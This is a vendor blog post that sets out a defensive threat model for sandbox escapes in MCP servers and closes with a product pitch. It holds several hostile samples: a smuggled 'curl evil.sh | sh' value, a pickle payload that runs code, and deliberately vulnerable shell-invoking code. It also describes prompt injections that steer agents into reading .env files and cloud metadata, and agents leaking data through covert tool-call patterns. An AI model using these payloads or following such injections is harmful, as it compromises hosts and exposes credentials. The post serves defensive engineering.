AI Security

MCP Server Sandbox Escapes: Threat Model

A threat model for sandbox escapes in Model Context Protocol servers, mapping attack surfaces from tool execution environments to host processes and shared state.

Nayan Dey
Senior Security Engineer
7 min read

The term "sandbox escape" has carried specific meaning in browser and mobile security for over a decade. In the Model Context Protocol (MCP) ecosystem, it is still being defined. An MCP server often runs user-supplied tools, invokes subprocesses, reads filesystems, and speaks to upstream APIs on behalf of an LLM. Each of those seams is a candidate sandbox boundary, and each boundary is a candidate escape path.

This post sketches a threat model for sandbox escapes in MCP deployments. It is not exhaustive. It is what we have found useful when reviewing production MCP servers and agentic platforms, and where the weak spots tend to hide.

The Implicit Sandbox Problem

The first thing worth naming is that many MCP servers do not explicitly declare a sandbox. They run tools in the same process as the server, share a filesystem with the host, keep credentials in environment variables, and assume that "only our tools run here." That is not a sandbox; it is a trust assumption.

When that assumption breaks — because a tool parses untrusted input, because a dependency has an RCE, because the LLM was tricked into passing a shell metacharacter — the blast radius is the entire host. Before modelling escapes, we need to be honest about whether there is any sandbox at all, and if so, where its walls are.

A serviceable definition for MCP purposes: a sandbox is a named execution context in which tool code runs, with a declared set of allowed syscalls, network destinations, filesystem paths, and environment variables, enforced by a mechanism outside the tool's own logic. Anything less is aspirational.
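That definition can be made concrete as a declared policy object. The sketch below is a hypothetical schema, not part of the MCP specification; the field names and the `SandboxPolicy` class are illustrative, but the point stands: the allowed surfaces are named data, checked by code outside the tool.

```python
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class SandboxPolicy:
    """Declared execution context for one tool (illustrative schema)."""
    name: str
    allowed_paths: frozenset = frozenset()    # filesystem roots the tool may touch
    allowed_hosts: frozenset = frozenset()    # outbound network destinations
    allowed_env: frozenset = frozenset()      # environment variables exposed
    allow_subprocess: bool = False

    def permits_path(self, path: str) -> bool:
        # Resolve symlinks and ".." first, so the check runs on what
        # the OS would actually open, not on the string the model sent.
        real = os.path.realpath(path)
        return any(real == root or real.startswith(root.rstrip("/") + "/")
                   for root in self.allowed_paths)
```

Enforcement still has to live outside the tool's own logic (seccomp, mount namespaces, network policy); the policy object only makes the intended walls auditable.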

Tool Execution as the Primary Attack Surface

Tools are where user data, model-generated arguments, and server code meet. The vast majority of realistic sandbox escapes we see begin there. The attack flow is usually: the LLM is induced (through prompt injection, adversarial input, or misuse by the end user) to pass crafted arguments to a tool, and the tool's implementation interprets those arguments in a way that crosses a trust boundary.

Common flavours:

Command injection through shell-invoking tools. A tool that runs git clone $url or grep $pattern without proper argument handling becomes a shell on the host as soon as an argument contains a semicolon or backtick. This is 1990s-era territory, but it shows up in MCP tooling because the tools are often thin wrappers around CLI utilities and the authors forget that the "user" input is now model-generated and adversarial.
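The fix is the same as it was in the 1990s: pass an argument vector instead of a shell string, and validate before invoking. A minimal sketch (the scheme check and the `clone_safe` name are illustrative choices, not a complete validator):

```python
import subprocess


def clone_unsafe(url: str) -> None:
    # VULNERABLE: a model-supplied url like "https://x; curl evil.sh | sh"
    # becomes two shell commands.
    subprocess.run(f"git clone {url}", shell=True)


def clone_safe(url: str, dest: str) -> None:
    # Reject surprising schemes before the URL reaches git at all.
    if not url.startswith(("https://", "git@")):
        raise ValueError(f"refusing to clone non-https URL: {url!r}")
    # Argument-vector invocation: no shell, so metacharacters stay literal.
    # "--" stops git from parsing the url as an option like --upload-pack.
    subprocess.run(["git", "clone", "--", url, dest], check=True)
```

Rejecting rather than escaping is deliberate: escaping rules differ per shell and per CLI, and a missed case is a host compromise.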

Path traversal in file-reading tools. A read_file tool that accepts a path and returns its contents is an exfiltration primitive if it does not canonicalise and validate paths. Agents have been observed, via prompt injection in retrieved documents, asking for ../../.env or /proc/self/environ. If the tool obliges, the sandbox is gone.
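Canonicalise-then-check is the core of the fix. A sketch, assuming a single workspace root (the `/srv/agent/workspace` path is a placeholder):

```python
import os

WORKSPACE = "/srv/agent/workspace"  # hypothetical sandbox root


def resolve_in_workspace(path: str, root: str = WORKSPACE) -> str:
    # realpath collapses ".." and follows symlinks, so the containment
    # check runs on the path the OS would actually open.
    real = os.path.realpath(os.path.join(root, path))
    if os.path.commonpath([real, root]) != root:
        raise PermissionError(f"path escapes workspace: {path!r}")
    return real


def read_file(path: str) -> str:
    with open(resolve_in_workspace(path)) as f:
        return f.read()
```

The order matters: a check on the raw string is defeated by `..` segments and symlinks; the check must run after canonicalisation.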

Deserialisation of attacker-influenced data. Tools that unmarshal JSON, YAML, pickle, or proprietary formats from model-supplied arguments are candidates for classic deserialisation RCE. Pickle, and YAML parsed with an unsafe loader, are particularly dangerous and should never be used on model-controlled input.
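The asymmetry is worth seeing once: pickle runs code at load time by design, while JSON can only ever yield data. A sketch (the `Exploit` class and `parse_tool_args` helper are illustrative):

```python
import json
import pickle


class Exploit:
    # pickle invokes __reduce__ when loading, so a crafted payload
    # executes an arbitrary callable at deserialisation time.
    def __reduce__(self):
        import os
        return (os.system, ("echo pwned",))


payload = pickle.dumps(Exploit())
# pickle.loads(payload)  # would run `echo pwned` -- never on model input


def parse_tool_args(raw: str) -> dict:
    # json.loads yields only data (dict/list/str/number/bool/None), never code.
    args = json.loads(raw)
    if not isinstance(args, dict):
        raise TypeError("tool arguments must be a JSON object")
    return args
```

If a tool genuinely must accept YAML, `yaml.safe_load` restricts output to plain data types; the default loaders of older PyYAML versions do not.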

SSRF through network-fetching tools. A fetch_url tool that does not block link-local, loopback, and internal cloud metadata addresses is a credentials-exfiltration primitive on any cloud host. We have seen agents coaxed into pulling 169.254.169.254/latest/meta-data/iam/ because a malicious document told them to "verify the deployment environment."
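A baseline destination check, sketched with the standard library (the function name is illustrative; note this is a pre-flight check only, and a production fetcher should also pin the resolved IP for the actual connection to defeat DNS rebinding):

```python
import ipaddress
import socket
from urllib.parse import urlparse


def assert_public_destination(url: str) -> None:
    host = urlparse(url).hostname
    if host is None:
        raise ValueError(f"no hostname in {url!r}")
    # Check *every* address the name maps to; a DNS answer can mix
    # public and internal addresses.
    for info in socket.getaddrinfo(host, None):
        addr = ipaddress.ip_address(info[4][0])
        if (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_reserved or addr.is_multicast):
            raise PermissionError(f"blocked internal address: {addr}")
```

The link-local check is what catches `169.254.169.254`; an outbound allow-list per tool is still stronger than any deny-list.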

Host-Level Escapes From Inside a Container

Containerised MCP servers raise the bar but do not close the surface. Container escapes come in several well-known varieties, and MCP servers concentrate a few risk factors that make them relevant: tools frequently need to mount volumes for workspace access, run child processes, and reach out to the network. Each of those is a knob that, set wrong, turns a container boundary into a polite suggestion.

Specific patterns to watch:

Mounting the Docker socket. A tool that needs to "run a container" sometimes gets access to /var/run/docker.sock on the host. That grants full root on the host to anyone who can use that socket. It should never be mounted into an MCP server that runs model-supplied tools.

Privileged containers and --cap-add. Tools that need kernel capabilities (NET_ADMIN, SYS_PTRACE, SYS_ADMIN) are a strong signal the threat model needs reconsideration. Most MCP tools do not need these, and the ones that think they do often have an alternative design.

Shared namespaces. Running with --pid=host or --net=host for convenience erases most of what a container provides. If tools need host-level visibility, the answer is usually a different architecture, not dropping isolation.

Writable host mounts. A tool that mounts the user's workspace read-write to manipulate files needs path-scoped mounts, not home-directory-wide mounts. Otherwise a path traversal in the tool plus a writable mount equals arbitrary host file write.
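The four patterns above invert into a reasonable default posture for a containerised tool runner. A sketch of the corresponding `docker run` flags; the image name and workspace path are placeholders, and the exact limits should be tuned per tool:

```shell
# Illustrative hardened invocation for a per-job tool runner.
docker run --rm \
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid,size=64m \
  --cap-drop=ALL \
  --security-opt no-new-privileges:true \
  --pids-limit 128 \
  --network none \
  --mount type=bind,src=/srv/jobs/job-1234/workspace,dst=/workspace \
  mcp-tool-runner:latest
```

Note what is absent: no Docker socket, no `--privileged`, no `--pid=host` or `--net=host`, and the bind mount is scoped to one job's workspace rather than a home directory.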

Shared State and Tenant Boundary Escapes

In multi-tenant MCP deployments, sandbox escape is not only about reaching the host. It is also about reaching another tenant's data. The shared-state surfaces we focus on:

Shared caches keyed carelessly. If a caching layer keys on (tool, arguments) and two tenants happen to call the same tool with the same arguments — entirely plausible for anything that queries public data — one tenant can receive the other's cached result if the cache does not include tenant identity in the key.
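The fix is mechanical: tenant identity goes into the key. A sketch (the helper name and delimiter choice are illustrative):

```python
import hashlib
import json


def cache_key(tenant_id: str, tool: str, arguments: dict) -> str:
    # Canonical JSON so {"a":1,"b":2} and {"b":2,"a":1} produce one key.
    canonical = json.dumps(arguments, sort_keys=True, separators=(",", ":"))
    # NUL delimiters prevent key-boundary ambiguity between fields.
    raw = f"{tenant_id}\x00{tool}\x00{canonical}"
    return hashlib.sha256(raw.encode()).hexdigest()
```

With tenant identity in the key, two tenants issuing the byte-identical query can never receive each other's cached result; the cost is a lower hit rate on genuinely public data, which is the correct trade.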

Shared temporary directories. Tools that write to /tmp in a server process handling many tenants create cross-tenant leakage if temp filenames are guessable or not cleaned up. We have seen credential files from one tenant's workflow read by another tenant's tool invocation because both ended up with the same scratch path.
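Both failure modes — guessable names and missing cleanup — disappear with per-invocation scratch directories. A sketch using the standard library (`tenant_scratch` is an illustrative name):

```python
import shutil
import tempfile
from contextlib import contextmanager


@contextmanager
def tenant_scratch(tenant_id: str):
    # mkdtemp creates a fresh, unguessable, owner-only (0700) directory
    # per invocation, instead of a fixed shared path like /tmp/mcp-scratch.
    d = tempfile.mkdtemp(prefix=f"mcp-{tenant_id}-")
    try:
        yield d
    finally:
        # Cleanup happens even if the tool invocation raises.
        shutil.rmtree(d, ignore_errors=True)
```

Usage is `with tenant_scratch(tenant_id) as workdir:` around the tool invocation, so no scratch path ever outlives the call that created it.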

Shared credential context. If tool A runs with tenant 1's credentials and tool B runs concurrently with tenant 2's credentials, and both are handled by the same async runtime, a bug in credential-context propagation can let tool B's request go out with tool A's credentials. This class of bug is subtle, hard to test, and catastrophic when it occurs.
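The bug typically arises when credentials live in a module-level global that concurrent tasks overwrite. Python's `contextvars` gives each task its own copy, which is one way to make propagation correct by construction; the sketch below shows the pattern (names are illustrative):

```python
import asyncio
import contextvars

# Each asyncio task runs in a copy of the context, so set() in one
# task is invisible to tasks running concurrently on the same loop.
current_credentials: contextvars.ContextVar = contextvars.ContextVar("creds")


async def run_tool(tenant: str, token: str) -> str:
    current_credentials.set(token)
    await asyncio.sleep(0)  # yield point: another tenant's task runs here
    # A module-level global would now hold the *other* tenant's token.
    return f"{tenant} used {current_credentials.get()}"
```

The `await` in the middle is the whole story: any yield point between "set credentials" and "use credentials" is where a global-variable design leaks one tenant's token into another tenant's request.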

Covert Channels and Telemetry Exfiltration

Even a well-sandboxed tool may leak through the server's own telemetry or response pathway. An agent that cannot exfiltrate data directly can sometimes encode information into tool call patterns, argument choices, or response timing that a cooperating observer can decode. This matters most when the MCP server handles sensitive data and when its telemetry pipeline is accessible to parties outside the tenant.

Practical hardening: redact tool arguments before logging, constrain response shapes to what the tool advertises, and treat timing-based signals as in-scope for high-sensitivity deployments.
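The first of those controls is a few lines of code. A minimal sketch of argument redaction before logging (the key-name list and function names are illustrative starting points, not a complete secret detector):

```python
import logging

# Key names that suggest the value is a secret (illustrative, extend per deployment).
SENSITIVE = ("token", "password", "authorization", "api_key", "secret")


def redact_args(arguments: dict) -> dict:
    # Log the call's structure, never secret values.
    return {
        k: "[REDACTED]" if any(s in k.lower() for s in SENSITIVE) else v
        for k, v in arguments.items()
    }


def log_tool_call(tool: str, arguments: dict) -> None:
    logging.info("tool=%s args=%s", tool, redact_args(arguments))
```

Key-name matching catches the common cases; high-sensitivity deployments should pair it with value-pattern scanning, since secrets also arrive under innocent key names.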

Defence in Depth That Actually Helps

The controls that consistently pay off:

  • Run each tool invocation in an ephemeral execution context with no persistent state, minimal writable filesystem, and no credentials beyond those needed for that specific call.
  • Use syscall filtering (seccomp) and Linux capabilities (drop everything, add back what is explicitly needed) rather than relying on container defaults.
  • Block internal network ranges and cloud metadata endpoints by default; allow-list outbound destinations per tool.
  • Canonicalise and validate all path, URL, and command arguments before use. Reject rather than sanitise when in doubt.
  • Never parse pickle, YAML with unsafe loaders, or other code-equivalent formats on model-controlled input.
  • Scope credentials to the tool and the tenant, and rotate aggressively.

How Safeguard Helps

Safeguard models each MCP tool as a distinct sandbox boundary and evaluates its declared inputs, outputs, and execution context against a library of escape patterns drawn from real-world incidents. The platform's continuous threat modelling flags tools that shell out, parse unsafe formats, mount sensitive paths, or reach internal network ranges, and it maps each finding to a concrete mitigation. Runtime guardrails enforce path canonicalisation, network allow-lists, and argument validation before tool code runs, closing the most common escape primitives without requiring every team to write those controls from scratch. When a sandbox escape is attempted, Safeguard correlates the tool call, the upstream prompt, and the tenant to give incident responders a single timeline instead of a fragmented forensic trail.
